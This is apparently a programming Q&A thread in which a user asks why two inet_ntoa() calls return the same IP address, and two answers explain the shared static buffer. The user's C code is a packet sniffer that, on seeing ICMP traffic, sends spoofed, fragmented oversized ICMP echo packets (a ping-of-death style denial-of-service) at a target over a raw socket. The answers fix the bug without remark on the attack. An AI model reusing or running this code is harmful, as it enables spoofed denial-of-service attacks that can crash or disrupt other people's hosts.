Why are the two lines printing the same value when I assigned different values ββto them?
void
got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
static int count = 1; /* packet counter */
/* declare pointers to packet headers */
const struct sniff_ethernet *ethernet; /* The ethernet header [1] */
const struct sniff_ip *ip; /* The IP header */
const struct sniff_tcp *tcp; /* The TCP header */
const char *payload; /* Packet payload */
int size_ip;
int size_tcp;
int size_payload;
printf("\nPacket number %d:\n", count);
count++;
/* define ethernet header */
ethernet = (struct sniff_ethernet*)(packet);
/* define/compute ip header offset */
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
printf(" * Invalid IP header length: %u bytes\n", size_ip);
return;
}
/* print source and destination IP addresses */
printf(" From: %s\n", inet_ntoa(ip->ip_src));//<-------------------------
printf(" To: %s\n", inet_ntoa(ip->ip_dst));//<------------------------
/* determine protocol */
switch(ip->ip_p) {
case IPPROTO_TCP:
printf(" Protocol: TCP\n");
break;
case IPPROTO_UDP:
printf(" Protocol: UDP\n");
return;
case IPPROTO_ICMP:
printf(" Protocol: ICMP\n");
/*********************************************************************************************/
char *sinfo[1];
sinfo[0] = inet_ntoa(ip->ip_src);//<----------------------------
char *dinfo[1];
dinfo[0] = inet_ntoa(ip->ip_dst);//<----------------------------
int s, i;
char buf[400];
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on;
//int num = 5;
printf("%s- saddress is the spoofed source address\n", sinfo[0]);
printf("%s- dstaddress is the target\n", dinfo[0]);
printf("- number is the number of packets to send, 2 is the default\n");
/* Loop based on the packet number */
for(i=1;i<=2;i++)
{
on = 1;
bzero(buf, sizeof(buf));
/* Create RAW socket */
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("socket() error");
/* If something wrong, just exit */
exit(1);
}
/* socket options, tell the kernel we provide the IP structure */
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0)
{
perror("setsockopt() for IP_HDRINCL error");
exit(1);
}
if((hp = gethostbyname(dinfo[0])) == NULL)
{
if((ip->ip_dst.s_addr = inet_addr(dinfo[0])) == -1)
{
fprintf(stderr, "%s: Can't resolve, unknown host.\n", dinfo[0]);
exit(1);
}
}
else
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
/* The following source address just redundant for target to collect */
if((hp2 = gethostbyname(sinfo[0])) == NULL)
{
if((ip->ip_src.s_addr = inet_addr(sinfo[0])) == -1)
{
fprintf(stderr, "%s: Can't resolve, unknown host\n", sinfo[0]);
exit(1);
}
}
else
bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
printf("Sending to %s from spoofed %s\n", inet_ntoa(ip->ip_dst), sinfo[0]);
/* Ip structure, check the ip.h */
ip->ip_v = 4;
ip->ip_hl = sizeof*ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons(sizeof(buf));
ip->ip_id = htons(4321);
ip->ip_off = htons(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* Let kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->type = ICMP_ECHO;
icmp->code = 0;
/* Header checksum */
icmp->checksum = htons(~(ICMP_ECHO << 8));
for(offset = 0; offset < 65536; offset += (sizeof(buf) - sizeof(*ip)))
{
ip->ip_off = htons(offset >> 3);
if(offset < 65120)
ip->ip_off |= htons(0x2000);
else
ip->ip_len = htons(418); /* make total 65538 */
/* sending time */
if(sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0)
{
fprintf(stderr, "offset %d: ", offset);
perror("sendto() error");
}
else
printf("sendto() is OK.\n");
/* IF offset = 0, define our ICMP structure */
if(offset == 0)
{
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
}
}
/* close socket */
close(s);
sleep(300);
}
// return 0;
//}
/******************************************************************************************/
return;
case IPPROTO_IP:
printf(" Protocol: IP\n");
return;
default:
printf(" Protocol: unknown\n");
return;
}
/*
* OK, this packet is TCP.
*/
/* define/compute tcp header offset */
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
size_tcp = TH_OFF(tcp)*4;
if (size_tcp < 20) {
printf(" * Invalid TCP header length: %u bytes\n", size_tcp);
return;
}
printf(" Src port: %d\n", ntohs(tcp->th_sport));
printf(" Dst port: %d\n", ntohs(tcp->th_dport));
/* define/compute tcp payload (segment) offset */
payload = (u_char *)(packet + SIZE_ETHERNET + size_ip + size_tcp);
/* compute tcp payload (segment) size */
size_payload = ntohs(ip->ip_len) - (size_ip + size_tcp);
/*
* Print payload data; it might be binary, so don't just
* treat it as a string.
*/
if (size_payload > 0) {
printf(" Payload (%d bytes):\n", size_payload);
print_payload(payload, size_payload);
}
return;
}
In the above code, I am trying to store 2 ip addresses. One is the source IP address and the other is the destination IP address. I've created 2 lines and stored the source address in a sinfo string variable and the destination address in a variable labeled dinfo. However, sinfo and dinfo output the same address. Here's the result:
Package number 1:
From: 192.168.29.138
To: 192.168.0.130
Protocol: ICMP
192.168.0.130- chest is a fake source address
192.168.0.130- dstaddress is the target
- number - number of sent packets, 2 - default value
Sending to 192.168.0.130 from spoofed 192.168.0.130
It prints From: and To: correctly, but not for sinfo and dinfo. I do not know what's the problem.
source to share
inet_ntoa()
returns a pointer to a static buffer, so the second call overwrites the result of the first call:
char *sinfo[1];
sinfo[0] = inet_ntoa(ip->ip_src);
char *dinfo[1];
dinfo[0] = inet_ntoa(ip->ip_dst);
dinfo[0]
and sinfo[0]
now both are pointing to the same (static) buffer - the buffer only contains the result from the second call. You need to copy the result from inet_ntoa () into your own buffer (I'm also not sure why you are using an array of pointers of size 1, a simple pointer is enough):
char *sinfo = strdup(inet_ntoa(ip->ip_src));
char *dinfo = strdup(inet_ntoa(ip->ip_dst));
...
free(sinfo);
free(dinfo);
As suggested by @cnicutar, you can also use inet_ntop , which does not use a static buffer, but allows you to pass the destination buffer directly:
char str[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &addr, str, INET_ADDRSTRLEN);
Also, it inet_ntoa()
does not handle IPv6 , it inet_ntop()
does.
source to share
The value returned cannot be stored inet_ntoa
as it is overwritten by subsequent calls:
USE APPLICATIONS
The return value of inet_ntoa () can point to static data that can be overwritten by subsequent calls to inet_ntoa ().
Instead, you should use strdup
:
sinfo[0] = strdup(inet_ntoa(ip->ip_src));
And remember free(sinfo[0])
. The same goes for dinfo[0]
.
All that said, moving to the recommended one is better on many levels, and will also solve your specific problem. inet_ntop
source to share